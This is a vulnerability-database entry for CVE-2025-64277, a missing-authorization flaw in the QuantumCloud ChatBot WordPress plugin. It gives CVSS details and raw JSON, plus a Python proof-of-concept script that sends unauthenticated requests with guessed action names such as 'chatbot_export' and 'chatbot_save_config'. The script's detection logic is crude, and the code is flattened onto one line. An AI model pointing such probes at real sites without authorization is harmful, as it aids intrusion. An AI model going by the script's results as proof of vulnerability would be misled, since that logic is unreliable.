Security Vulnerability Report
中文
CVE-2025-64277 CVSS 5.3 MEDIUM

CVE-2025-64277

Published: 2025-11-13 10:15:53
Last Modified: 2026-04-27 16:16:40

Description

Missing Authorization vulnerability in QuantumCloud ChatBot chatbot allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ChatBot: from n/a through <= 7.3.9.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

QuantumCloud ChatBot WordPress插件 <= 7.3.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-64277 PoC - WordPress ChatBot Plugin Authorization Bypass # Target: WordPress site with QuantumCloud ChatBot plugin <= 7.3.9 def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-64277 """ # Common ChatBot AJAX endpoints endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/chatbot/v1/', '/?rest_route=/chatbot/v1/' ] # Vulnerable parameters that may be exploited payloads = [ {'action': 'chatbot_get_data'}, {'action': 'chatbot_get_settings'}, {'action': 'chatbot_export'}, {'action': 'chatbot_save_config'} ] print(f"[*] Testing target: {target_url}") print(f"[*] Checking for CVE-2025-64277 vulnerability...\n") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint for payload in payloads: try: response = requests.post(url, data=payload, timeout=10, verify=False) # Check if we get a successful response without authentication if response.status_code == 200: print(f"[!] Potential vulnerability found at {url}") print(f"[!] Payload: {payload}") print(f"[!] Response status: {response.status_code}") print(f"[!] Response preview: {response.text[:200]}...\n") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("[*] Scan complete. Manual verification recommended.") if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2025-64277-poc.py <target_url>") print("Example: python cve-2025-64277-poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64277", "sourceIdentifier": "[email protected]", "published": "2025-11-13T10:15:53.113", "lastModified": "2026-04-27T16:16:39.663", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in QuantumCloud ChatBot chatbot allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ChatBot: from n/a through <= 7.3.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/chatbot/vulnerability/wordpress-chatbot-plugin-7-3-9-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}